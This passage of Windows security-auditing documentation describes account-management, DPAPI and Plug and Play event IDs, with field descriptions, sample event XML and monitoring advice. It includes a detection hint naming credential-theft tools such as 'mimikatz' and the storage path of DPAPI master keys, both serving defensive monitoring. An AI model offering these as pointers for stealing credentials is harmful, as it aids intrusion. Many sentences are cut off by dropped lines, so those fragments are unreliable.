applicable and always appears as “<value not set>.“
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. If the value of
pwdLastSet attribute of user object was changed, you will see the new value here. For example: 8/12/2015
11:41:39 AM. This value will be changed, for example, after manual user account password reset. For local
Account Expires [Type = UnicodeString]: the date when the account expires. If the value of
accountExpires attribute of user object was changed, you will see the new value here. . For example,
“9/21/2015 12:00:00 AM”. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. For local accounts, this field always has some value—if the account's
attribute was not changed it will contain the current value of the attribute.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID ) of user’s object primary group.
domain.
This field will contain some value if user’s object primary group was changed. You can change user’s primary
group using Active Directory Users and Computers management console in the Member Of tab of user object
properties. You will see a RID of new primary group as a field value. For example, RID 513 (Domain Users) is a
default primary group for users.
Typical Primary Group values for user accounts:
513 (Domain Users. For local accounts this RID means Users) – for domain and local users.
See this article https://support.microsoft.com/kb/243330 for more information. If the value of
primaryGroupID attribute of user object was changed, you will see the new value here.
AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present
delegated credentials. Can be changed using Active Directory Users and Computers management console
in Delegation tab of user account, if at least one SPN is registered for user account. If the SPNs list on
Delegation tab of a user account was changed, you will see the new SPNs list in AllowedToDelegateTo
field (note that you will see the new list instead of changes) of this event. This is an example of
AllowedToDelegateTo:
dcom/WIN2012
dcom/WIN2012.contoso.local
If the value of msDS -AllowedToDelegateTo attribute of user object was changed, you will see the
new value here.
The value can be “<value not set>”, for example, if delegation was disabled.
For local accounts, this field is not applicable and always has “-“ value.
script, and other behavior for the user account. This parameter contains the previous value of
userAccountControl attribute of user object.
script, and other behavior for the user account. If the value of userAccountControl attribute of user object
was changed, you will see the new value here.
event. Subtract the property value from the flags value in the event and note that the flag applies and then go on
to the next flag.
Decoding:
• LOCKOUT 0x0010
• SCRIPT 0x0001
User Account Control [Type = UnicodeString]: shows the list of changes in userAccountControl
attribute. You will see a line of text for each change. See possible values in here: “Table 7. User’s or
Computer’s account UAC flags.”. In the “User Account Control field text” column, you can see the text that
will be displayed in the User Account Control field in 4738 event.
Computers management console in Dial-in tab of user’s account properties, then you will see <value
changed, but not displayed> in this field. For local accounts, this field is not applicable and always has
“<value not set>“ value.
attribute of user object was changed, you will see the new value here.
Logon Hours [Type = UnicodeString]: hours that the account is allowed to logon to the domain. If the
value of logonHours attribute of user object was changed, you will see the new value here. You can
change this attribute by using Active Directory Users and Computers, or through a script, for example.
Here is an example of this field:
Sunday 12:00 AM - 7:00 PM
Sunday 9:00 PM -Monday 1:00 PM
Monday 2:00 PM -Tuesday 6:00 PM
Tuesday 8:00 PM -Wednesday 10:00 AM
For local accounts this field is not applicable and typically has value “All”.
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as
“-”. See full list of user privileges in “Table 8. User Privileges.”.

For 4738(S ): A user account was changed.
Some organizations monitor every 4738 event.

If you have critical user computer accounts (for example, domain administrator accounts or service
accounts) for which you need to monitor each change, monitor this event with the “Target
Account\Account Name” that corresponds to the critical account or accounts.
If you have user accounts for which any change in the services list on the Delegation tab should be
monitored, monitor this event when AllowedToDelegateTo is not -. This value means the services list
was changed.
Consider whether to track the following fields:
FIELD TO TRACK REASON TO TRACK
Display Name We recommend monitoring all changes for these fields for
User Principal Name critical domain and local accounts.
Home Directory
Home Drive
Script Path
Profile Path
User Workstations
Password Last Set
Account Expires
Primary Group ID
Logon Hours
Primary Group ID is not 513 Typically, the Primary Group value is 513 for domain and
local users. Other values should be monitored.
For user accounts for which the services list (on the If AllowedToDelegateTo is marked <value not set> on
Delegation tab) should not be empty: user accounts that previously had a services list (on the
AllowedToDelegateTo is marked **<value not set> ** Delegation tab), it means the list was cleared.
Consider whether to track the following user account control flags:
'Normal Account' – Disabled Should not be disabled for user accounts.
'Password Not Required' – Enabled Should not typically be enabled for user accounts because it
weakens security for the account.
'Encrypted Text Password Allowed' – Enabled Should not typically be enabled for user accounts because it
weakens security for the account.
'Server Trust Account' – Enabled Should never be enabled for user accounts. Applies only to
domain controller (computer) accounts.
'Don't Expire Password' – Enabled Should be monitored for critical accounts, or all accounts if
your organization does not allow this flag.
'Smartcard Required' – Enabled Should be monitored for critical accounts.
'Password Not Required' – Disabled Should be monitored for all accounts where the setting
should be “Enabled.”
'Encrypted Text Password Allowed' – Disabled Should be monitored for all accounts where the setting
'Don't Expire Password' – Disabled Should be monitored for all accounts where the setting
'Smartcard Required' – Disabled Should be monitored for all accounts where the setting
'Trusted For Delegation' – Enabled Means that Kerberos Constraint or Unconstraint delegation
was enabled for the user account. We recommend monitoring
this to discover whether it is an approved action (done by an
'Trusted For Delegation' – Disabled Means that Kerberos Constraint or Unconstraint delegation
was disabled for the user account. We recommend
Also, if you have a list of user accounts for which delegation is
critical and should not be disabled, monitor this for those
accounts.
'Trusted To Authenticate For Delegation' – Enabled Means that Protocol Transition delegation was enabled for
the user account. We recommend monitoring this to discover
whether it is an approved action (done by an administrator), a
mistake, or a malicious action.
'Trusted To Authenticate For Delegation' – Disabled Means that Protocol Transition delegation was disabled for
the user account. We recommend monitoring this to discover
whether it is an approved action (done by an administrator), a
mistake, or a malicious action.
Also, if you have a list of user accounts for which delegation is
critical and should not be disabled, monitor this for those
accounts.
'Not Delegated' – Enabled Means that Account is sensitive and cannot be delegated
was checked for the user account. We recommend monitoring
this to discover whether it is an approved action (done by an
'Not Delegated' – Disabled Should be monitored for all accounts where the setting
should be “Enabled.” Means that Account is sensitive and
cannot be delegated was unchecked for the user account.
We recommend monitoring this to discover whether it is an
approved action (done by an administrator), a mistake, or a
malicious action.
'Use DES Key Only' – Enabled Should not typically be enabled for user accounts because it
weakens security for the account’s Kerberos authentication.
'Don't Require Preauth' – Enabled Should not be enabled for user accounts because it weakens
security for the account’s Kerberos authentication.
'Use DES Key Only' – Disabled Should be monitored for all accounts where the setting
'Don't Require Preauth' – Disabled Should be monitored for all accounts where the setting
4740(S): A user account was locked out.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time a user
account is locked out.
workstations.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetDomainName">WIN81</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that performed the lockout operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that performed the lockout operation.
Account Domain [Type = UnicodeString]: domain or computer name. Formats vary, and include the
following:
Account That Was Locked Out:
Security ID [Type = SID ]: SID of account that was locked out. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that was locked out.
Caller Computer Name [Type = UnicodeString]: the name of computer account from which logon attempt
was received and after which target account was locked out. For example: WIN81.

For 4740(S ): A user account was locked out.
Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
If you have high-value domain or local accounts (for example, domain administrator accounts) for which
you need to monitor every lockout, monitor all 4740 events with the “Account That Was Locked Out
\Security ID” values that correspond to the accounts.
4740 events with the “Account That Was Locked Out \Security ID” that corresponds to the account.
If the user account “Account That Was Locked Out\Security ID” should not be used (for authentication
attempts) from the Additional Information\Caller Computer Name, then trigger an alert.
Monitor for all 4740 events where Additional Information\Caller Computer Name is not from your
domain. However, be aware that even if the computer is not in your domain you will get the computer
name instead of an IP address in the 4740 event.
4765(S): SID History was added to an account.
Applies to
Windows 10
Windows Server 2016
This event generates when SID History was added to an account.
See more information about SID History here: https://technet.microsoft.com/library/cc779590(v=ws.10).aspx.
There is no example of this event in this document.
Subcategory: Audit User Account Management
Event Schema:
SID History was added to an account.
Subject:
Security ID:%6
Account Name:%7
Account Domain:%8
Logon ID:%9
Target Account:
Security ID:%5
Account Name:%3
Account Domain:%4
Source Account:
Security ID:%2
Account Name:%1
Privileges:%10
SID List:%11

Event Versions: 0.
4766(F): An attempt to add SID History to an account
failed.
Applies to
Windows 10
Windows Server 2016
This event generates when an attempt to add SID History to an account failed.
See more information about SID History here: https://technet.microsoft.com/library/cc779590(v=ws.10).aspx.
Event Schema:
An attempt to add SID History to an account failed.
Subject:
Security ID:-
Account Name:%5
Account Domain:%6
Logon ID:%7
Target Account:
Security ID:%4
Account Name:%2
Account Domain:%3
Source Account:
Account Name:%1
Privileges:%8

Event Versions: 0.
4767(S): A user account was unlocked.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time a user account
is unlocked.
workstations.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that performed the unlock operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that performed the unlock operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account that was unlocked. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that was unlocked.
For 4767(S ): A user account was unlocked.
We recommend monitoring all 4767 events for local accounts.

4780(S): The ACL was set on accounts which are
members of administrators groups.
Applies to
Windows 10
Windows Server 2016
Every hour, the domain controller that holds the primary domain controller (PDC ) Flexible Single Master
Operation (FSMO ) role compares the ACL on all security principal accounts (users, groups, and machine accounts)
present for its domain in Active Directory and that are in administrative or security-sensitive groups and which
have AdminCount attribute = 1 against the ACL on the AdminSDHolder object. If the ACL on the principal account
differs from the ACL on the AdminSDHolder object, then the ACL on the principal account is reset to match the
ACL on the AdminSDHolder object and this event is generated.
For some reason, this event doesn’t generate on some OS versions.
Event Schema:
The ACL was set on accounts which are members of administrators groups.
Subject:
Security ID:%4
Account Name:%5
Account Domain:%6
Logon ID:%7
Target Account:
Security ID:%3
Account Name:%1
Account Domain:%2
Privileges:%8

Event Versions: 0.

Monitor for this event and investigate why the object’s ACL was changed.
4781(S): The name of an account was changed.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time a user or
computer account name (sAMAccountName
attribute) is changed.
workstations.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OldTargetUserName">Admin</Data>
<Data Name="NewTargetUserName">MainAdmin</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that performed the “change account name” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that performed the “change account
name” operation.
the following:
Target Account:
Security ID [Type = SID ]: SID of account on which the name was changed. Event Viewer automatically
in the event.
Old Account Name [Type = UnicodeString]: old name of target account.
New Account Name [Type = UnicodeString]: new name of target account.

For 4781(S ): The name of an account was changed.
If you have high-value user or computer accounts (or local user accounts) for which you need to monitor each
change to the accounts, monitor this event with the “Target Account\Security ID” that corresponds to the
high-value accounts.
4794(S, F): An attempt was made to set the Directory
Services Restore Mode administrator password.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time Directory
Services Restore Mode (DSRM ) administrator
password is changed.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="Workstation">DC01</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to set Directory Services Restore Mode
administrator password. Event Viewer automatically tries to resolve SIDs and show the account name. If the
SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that made an attempt to set Directory
Services Restore Mode administrator password.
the following:
Caller Workstation [Type = UnicodeString]: the name of computer account from which Directory Services
Restore Mode (DSRM ) administrator password change request was received. For example: “DC01”. If the
change request was sent locally (from the same server) this field will have the same name as the computer
account.
Status Code [Type = HexInt32]: for Success events it has “0x0” value.

For 4794(S, F ): An attempt was made to set the Directory Services Restore Mode administrator password.
Always monitor 4794 events and trigger alerts when they occur.
4798(S): A user's local group membership was
enumerated.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates when a process
enumerates a user's security-enabled local
groups on a computer or device.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation ActivityID="{CBAEDE08-1CF0-0000-50DE-AECBF01CD101}" />
<Computer>WIN10-1.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">WIN10-1</Data>
<Data Name="SubjectLogonId">0x72d9d</Data>
<Data Name="CallerProcessId">0xc80</Data>
<Data Name="CallerProcessName">C:\\Windows\\System32\\mmc.exe</Data>
</EventData>
</Event>
Required Server Roles: none.

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enumerate user's security-enabled local groups”
operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
Account Name [Type = UnicodeString]: the name of the account that requested the “enumerate user's
security-enabled local groups” operation.
the following:
User:
Security ID [Type = SID ]: SID of the account whose groups were enumerated. Event Viewer automatically
in the event.
Account Name [Type = UnicodeString]: the name of the account whose groups were enumerated.
Account Domain [Type = UnicodeString]: group’s domain or computer name. Formats vary, and include
the following:
For a local group, this field will contain the name of the computer to which this group belongs, for
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enumerated the members of the
group. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To

For 4798(S ): A user's local group membership was enumerated.
If you have high value domain or local accounts for which you need to monitor each enumeration of their
group membership, or any access attempt, monitor events with the “Subject\Security ID” that
corresponds to the high value account or accounts.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
5376(S): Credential Manager credentials were backed
up.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time the user
(Subject) successfully backs up the credential
manager database.
Typically this can be done by clicking “Back up
Credentials” in Credential Manager in the
Control Panel.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x30d7c</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that performed the backup operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that performed the backup operation.
the following:

For 5376(S ): Credential Manager credentials were backed up.
Every 5376 event should be recorded for all local and domain accounts, because this action (back up Credential
Manager) is very rarely used by users and can indicate a virus, or other harmful or malicious activity.
5377(S): Credential Manager credentials were
restored from a backup.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time the user
(Subject) successfully restores the credential
manager database.
Typically this can be done by clicking “Restore
Credentials” in Credential Manager in the
Control Panel.

Event XML:
- <System>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that performed the restore operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that performed the restore operation.
the following:

For 5377(S ): Credential Manager credentials were restored from a backup.
Every 5377 event should be recorded for all local and domain accounts, because this action (restore Credential
Manager credentials from a backup) is very rarely used by users, and can indicate a virus, or other harmful or
malicious activity.
Applies to
Windows 10
Windows Server 2016
Audit DPAPI Activity determines whether the operating system generates audit events when encryption or
decryption calls are made into the data protection application interface (DPAPI).
Event volume: Low.
STRONGER STRONGER
Domain IF IF IF IF IF – Events in this

Controller subcategory
typically have an
informational
purpose and it is
difficult to detect
any malicious
activity using
these events. It’s
mainly used for
DPAPI
troubleshooting.
Member Server IF IF IF IF IF – Events in this

subcategory
typically have an
informational
purpose and it is
difficult to detect
any malicious
activity using
mainly used for
DPAPI
troubleshooting.
Workstation IF IF IF IF IF – Events in this

subcategory
typically have an
informational
purpose and it is
difficult to detect
any malicious
activity using
mainly used for
DPAPI
troubleshooting.
Events List:
4692(S, F ): Backup of data protection master key was attempted.
4693(S, F ): Recovery of data protection master key was attempted.
4694(S, F ): Protection of auditable protected data was attempted.
4695(S, F ): Unprotection of auditable protected data was attempted.
4692(S, F): Backup of data protection master key was
attempted.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit DPAPI Activity
Event Description:
This event generates every time that a backup
is attempted for the DPAPI Master Key.
When a computer is a member of a domain,
DPAPI has a backup mechanism to allow
unprotection of the data. When a Master Key is
generated, DPAPI communicates with a
domain controller. Domain controllers have a
domain-wide public/private key pair, associated
solely with DPAPI. The local DPAPI client gets
the domain controller public key from a
domain controller by using a mutually
authenticated and privacy protected RPC call.
The client encrypts the Master Key with the
domain controller public key. It then stores this backup Master Key along with the Master Key protected by the
user's password.
Periodically, a domain-joined machine will try to send an RPC request to a domain controller to back up the user’s
master key so that the user can recover secrets in case his or her password has to be reset. Although the user's keys
are stored in the user profile, a domain controller must be contacted to encrypt the master key with a domain
recovery key.
This event also generates every time a new DPAPI Master Key is generated, for example.
This event generates on domain controllers, member servers, and workstations.
Failure event generates when a Master Key backup operation fails for some reason.
Event XML:
- <System>
<Level>0</Level>
<Task>13314</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">ladmin</Data>
<Data Name="SubjectLogonId">0x30c08</Data>
<Data Name="MasterKeyId">16cfaea0-dbe3-4d92-9523-d494edb546bc</Data>
<Data Name="RecoveryServer" />
<Data Name="RecoveryKeyId">806a0350-aeb1-4c56-91f9-ef16cf759291</Data>
<Data Name="FailureReason">0x0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested backup operation. Event Viewer automatically tries to
resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.
Account Name [Type = UnicodeString]: the name of the account that requested backup operation.
the following:
Key Information:
Key Identifier [Type = UnicodeString]: unique identifier of a master key which backup was created. The
Master Key is used, with some additional data, to generate an actual symmetric session key to
encrypt\decrypt the data using DPAPI. All of user's Master Keys are located in user profile ->
%APPDATA%\Roaming\Microsoft\Windows\Protect\%SID% folder. The name of every Master Key file is it’s
ID.
Recovery Server [Type = UnicodeString]: the name (typically – DNS name) of the computer that you
contacted to back up your Master Key. For domain joined machines, it’s typically a name of a domain
controller. This parameter might not be captured in the event, and in that case will be empty.
Recovery Key ID [Type = UnicodeString]: unique identifier of a recovery key. The recovery key is
generated when a user chooses to create a Password Reset Disk (PRD ) from the user's Control Panel or
when first Master Key is generated. First, DPAPI generates a RSA public/private key pair, which is the
recovery key. In this field you will see unique Recovery key ID which was used for Master key backup
operation.
For Failure events this field is typically empty.
Status Information:
Status Code [Type = HexInt32]: hexadecimal unique status code of performed operation. For Success events
this field is typically “0x0”. To see the meaning of status code you need to convert it to decimal value and us
“net helpmsg STATUS_CODE” command to see the description for specific STATUS_CODE. Here is an
example of “net helpmsg” command output for status code 0x3A:
[Net helpmsg 58 illustration](..images/net-helpmsg-58.png)

For 4692(S, F ): Backup of data protection master key was attempted.
This event is typically an informational event and it is difficult to detect any malicious activity using this event.
It’s mainly used for DPAPI troubleshooting.
4693(S, F): Recovery of data protection master key
was attempted.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time that recovery
is attempted for a DPAPI Master Key.
While unprotecting data, if DPAPI cannot use
the Master Key protected by the user's
password, it sends the backup Master Key to a
domain controller by using a mutually
authenticated and privacy protected RPC call.
The domain controller then decrypts the
Master Key with its private key and sends it
back to the client by using the same protected
RPC call. This protected RPC call is used to
ensure that no one listening on the network
can get the Master Key.
Failure event generates when a Master Key restore operation fails for some reason.
Event XML:
- <System>
<Level>0</Level>
<Task>13314</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="MasterKeyId">0445c766-75f0-4de7-82ad-d9d97aad59f6</Data>
<Data Name="RecoveryReason">0x5c005c</Data>
<Data Name="RecoveryServer">DC01.contoso.local</Data>
<Data Name="RecoveryKeyId" />
<Data Name="FailureId">0x380000</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “recover” operation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that requested the “recover” operation.
the following:
Key Information:
Key Identifier [Type = UnicodeString]: unique identifier of a master key which was recovered. The Master
Key is used, with some additional data, to generate an actual symmetric session key to encrypt\decrypt the
data using DPAPI. All of user's Master Keys are located in user profile ->
%APPDATA%\Roaming\Microsoft\Windows\Protect\%SID% folder. The name of every Master Key file is it’s
ID.
Recovery Server [Type = UnicodeString]: the name (typically – DNS name) of the computer that you
contacted to recover your Master Key. For domain joined machines, it’s typically a name of a domain
controller.
Note In this event Recovery Server field contains information from Recovery Reason field.
Recovery Key ID [Type = UnicodeString]: unique identifier of a recovery key. The recovery key is
generated when a user chooses to create a Password Reset Disk (PRD ) from the user's Control Panel or
when first Master Key is generated. First, DPAPI generates a RSA public/private key pair, which is the
recovery key. In this field you will see unique Recovery key ID which was used for Master key recovery
operation. This parameter might not be captured in the event, and in that case will be empty.
Recovery Reason [Type = HexInt32]: hexadecimal code of recovery reason.
Note In this event Recovery Reason field contains information from Recovery Server field.
Status Information:
Status Code [Type = HexInt32]: hexadecimal unique status code. For Success events this field is typically
“0x380000”.

For 4693(S, F ): Recovery of data protection master key was attempted.
This event is typically an informational event and it is difficult to detect any malicious activity using this
event. It’s mainly used for DPAPI troubleshooting.
For domain joined computers, Recovery Reason should typically be a domain controller DNS name.
4694(S, F): Protection of auditable protected data was
attempted.
Applies to
Windows 10
Windows Server 2016
This event generates if DPAPI CryptProtectData() function was used with CRYPTPROTECT_AUDIT flag
(dwFlags) enabled.
Event Schema:
Protection of auditable protected data was attempted.
Subject:
Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4
Protected Data:
Data Description:%6
Key Identifier:%5
Protected Data Flags:%7
Protection Algorithms:%8
Status Information:
Status Code:%9

Event Versions: 0.

4695(S, F): Unprotection of auditable protected data
was attempted.
Applies to
Windows 10
Windows Server 2016
This event generates if DPAPI CryptUnprotectData() function was used to unprotect “auditable” data that was
encrypted using CryptProtectData() function with CRYPTPROTECT_AUDIT flag (dwFlags) enabled.
Event Schema:
Unprotection of auditable protected data was attempted.
Subject:
Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4
Protected Data:
Data Description:%6
Key Identifier:%5
Protected Data Flags:%7
Protection Algorithms:%8
Status Information:
Status Code:%9

Event Versions: 0.

Audit PNP Activity
Applies to
Windows 10
Windows Server 2016
Audit PNP Activity determines when Plug and Play detects an external device.
A PnP audit event can be used to track down changes in system hardware and will be logged on the machine
where the change took place. For example, when a keyboard is plugged into a computer, a PnP event is triggered.
Event volume: Varies, depending on how the computer is used. Typically Low.
STRONGER STRONGER
Domain Yes No Yes No This subcategory

Controller will help identify
when and which
Plug and Play
device was
attached,
enabled, disabled
or restricted by
device installation
policy.
You can track, for
example, whether
a USB flash drive
or stick was
attached to a
domain
controller, which
is typically not
allowed.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server Yes No Yes No This subcategory

will help identify
when and which
Plug and Play
device was
attached,
enabled, disabled
or restricted by
device installation
policy.
You can track, for
example, whether
a USB flash drive
or stick was
attached to a
critical server,
which is typically
not allowed.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation Yes No Yes No This subcategory

will help identify
when and which
Plug and Play
device was
attached,
enabled, disabled
or restricted by
device installation
policy.
You can track, for
example, whether
a USB flash drive
or stick was
attached to an
administrative
workstation or
VIP workstation.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
6416(S ): A new external device was recognized by the System
6419(S ): A request was made to disable a device
6420(S ): A device was disabled.
6421(S ): A request was made to enable a device.
6422(S ): A device was enabled.
6423(S ): The installation of this device is forbidden by system policy.
6424(S ): The installation of this device was allowed, after having previously been forbidden by policy.
6416(S): A new external device was recognized by the
System.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time a new external
device is recognized by a system.
This event generates, for example, when a new
external device is connected or enabled.

Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>DESKTOP-NFC0HVN</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="DeviceId">SCSI\\Disk&Ven\_Seagate&Prod\_Expansion\\000000</Data>
<Data Name="DeviceDescription">Seagate Expansion SCSI Disk Device</Data>
<Data Name="ClassId">{4D36E967-E325-11CE-BFC1-08002BE10318}</Data>
<Data Name="ClassName">DiskDrive</Data>
<Data Name="VendorIds">SCSI\\DiskSeagate\_Expansion\_\_\_\_\_\_\_0636
SCSI\\DiskSeagate\_Expansion\_\_\_\_\_\_\_ SCSI\\DiskSeagate\_ SCSI\\Seagate\_Expansion\_\_\_\_\_\_\_0
Seagate\_Expansion\_\_\_\_\_\_\_0 GenDisk</Data>
<Data Name="CompatibleIds">SCSI\\Disk SCSI\\RAW</Data>
<Data Name="LocationInformation">Bus Number 0, Target Id 0, LUN 0</Data>
</EventData>
</Event>

Event Versions:
0 - Windows 10.
1 - Windows 10 [Version 1511].
Added “Device ID” field.
Added “Device Name” field.
Added “Class Name” field.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that registered the new device. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account that registered the new device.
the following:
Device ID [Type = UnicodeString] [Version 1]: “Device instance path” attribute of device. To see device
properties, start Device Manager, open specific device properties, and click “Details”:
Device Name [Type = UnicodeString] [Version 1]: “Device description” attribute of device. To see device
Class ID [Type = UnicodeString]: “Class Guid” attribute of device. To see device properties, start Device Manager,
open specific device properties, and click “Details”:
Class Name [Type = UnicodeString] [Version 1]: “Class” attribute of device. To see device properties, start Device
Manager, open specific device properties, and click “Details”:
Vendor IDs [Type = UnicodeString]: “Hardware Ids” attribute of device. To see device properties, start Device
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device. To see device properties, start
Device Manager, open specific device properties, and click “Details”:
Location Information [Type = UnicodeString]: “Location information” attribute of device. To see device

For 6416(S ): A new external device was recognized by the System.
You can use this event to track the events and event information shown in the following table by using the
listed fields:
EVENT AND EVENT INFORMATION TO MONITOR FIELD TO USE
Device recognition events, Device Instance Path “Device ID”
Device recognition events, Device Description “Device Name”
Device recognition events, Class GUID “Class ID”
Device recognition events, Hardware IDs “Vendor IDs”

Device recognition events, Compatible IDs “Compatible IDs”
Device recognition events, Location information “Location Information”

6419(S): A request was made to disable a device.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time
when someone made a request to
disable a device.
This event doesn’t mean that device
was disabled.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectDomainName">DESKTOP-NFC0HVN</Data>
<Data Name="SubjectLogonId">0x3fcc7</Data>
<Data Name="DeviceId">USB\\VID\_138A&PID\_0017\\FFBC12C950A0</Data>
<Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
<Data Name="ClassId">{53D29EF7-377C-4D14-864B-EB3A85769359}</Data>
<Data Name="ClassName">Biometric</Data>
<Data Name="HardwareIds">USB\\VID\_138A&PID\_0017&REV\_0078 USB\\VID\_138A&PID\_0017</Data>
<Data Name="CompatibleIds">USB\\Class\_FF&SubClass\_00&Prot\_00 USB\\Class\_FF&SubClass\_00
USB\\Class\_FF</Data>
<Data Name="LocationInformation">Port\_\#0002.Hub\_\#0004</Data>
</EventData>
</Event>

Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made the request. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that made the request.
the following:
Device ID [Type = UnicodeString]: “Device instance path” attribute of device. To see device properties, start
Device Name [Type = UnicodeString]: “Device description” attribute of device. To see device properties, start
Class Name [Type = UnicodeString]: “Class” attribute of device. To see device properties, start Device Manager,
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device. To see device properties, start Device

For 6419(S ): A request was made to disable a device.
You can use this event to track the events and event information shown in the following table by using the listed
fields:
Device disable requests, Device Instance Path “Device ID”
Device disable requests, Device Description “Device Name”
Device disable requests, Class GUID “Class ID”
Device disable requests, Hardware IDs “Hardware IDs”
Device disable requests, Compatible IDs “Compatible IDs”
Device disable requests, Location information “Location Information”

6420(S): A device was disabled.
Applies to
Windows 10
Windows Server 2016
Event Description:
specific device was disabled.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DeviceId">USB\\VID\_138A&PID\_0017\\ffbc12c950a0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that disabled the device. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that disabled the device.
the following:

For 6420(S ): A device was disabled.
fields:
Device disable events, Device Instance Path “Device ID”
Device disable events, Device Description “Device Name”
Device disable events, Class GUID “Class ID”
Device disable events, Hardware IDs “Hardware IDs”
